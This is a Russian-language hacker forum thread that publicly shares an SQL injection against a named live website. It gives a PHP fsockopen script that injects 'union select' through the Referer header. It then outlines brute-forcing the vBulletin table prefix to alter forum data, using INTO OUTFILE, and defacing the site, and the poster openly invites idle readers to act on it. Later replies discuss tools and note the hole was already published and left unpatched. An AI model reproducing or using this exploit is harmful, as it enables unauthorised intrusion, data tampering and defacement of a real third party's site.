skvoznoy.org
 

Мимо проходил. Сайт из серии крутых хакеров:

skvoznoy.org

____________________________________
$fp=fsockopen("skvoznoy.org",80);

fputs($fp,"GET http://skvoznoy.org/news/332/ HTTP/1.0
Referer: http://skvoznoy.org/news/332/' union select 0,0/*

");
$get= fgets($fp).fgets($fp).fgets($fp).fgets($fp)
.fgets($fp).fgets($fp).fgets($fp).fgets($fp)
.fgets($fp).fgets($fp)
.fgets($fp).fgets($fp);
fclose($fp);
echo $get;
____________________________________

SQL-инъекция классическая в реферере. Цветом выделено 0,0 - неверное количество колонок, чтобы показать ошибку при выводе $get. На самом деле колонка одна. Вот, на сайте стоит вБуллетин. Надо сбрутить только преффикс и возможно БД для форума и можно будет удалять/добавлять данные. А можно похимичить и с ИНТО ОУТФАЙЛ.
Еще можно сбрутить имя таблицы новостей и задефейсить сайт

Ты это к чему? Ты вопрос какойто задал?

нет, дал пищу для размышлений и, возможно, каких-либо действий для тех кому заняться нечем

fsockopen очень уж часто я с ним сталкиваюсь. И понятно почему =)
Надо же.... Zadoxlik рано в паблик скинул ИМХО =)

Это ты в исходниках посмсотрел?

Блин жалко у меня ума не хватит что как делать а инькция у меня не вылазиет почему то.

Не, это просто пример эксплуатации с помощью PHP скрипта, ибо браузером ты такое не сделаешь.
На сколько мне известно, все нормальные люди пользуют в таких случаях InetCrack (или как-то так), но у меня его нет.

Телнет =)

интересно а зачем на паблик кинул=) я в скуле несилен к сожалению(

хех, эту уявзимость уже я наверное месяц назад на паблик выложил (смотри в теме "бажные сайты от киборга").
и никто даже не пытался прикрыть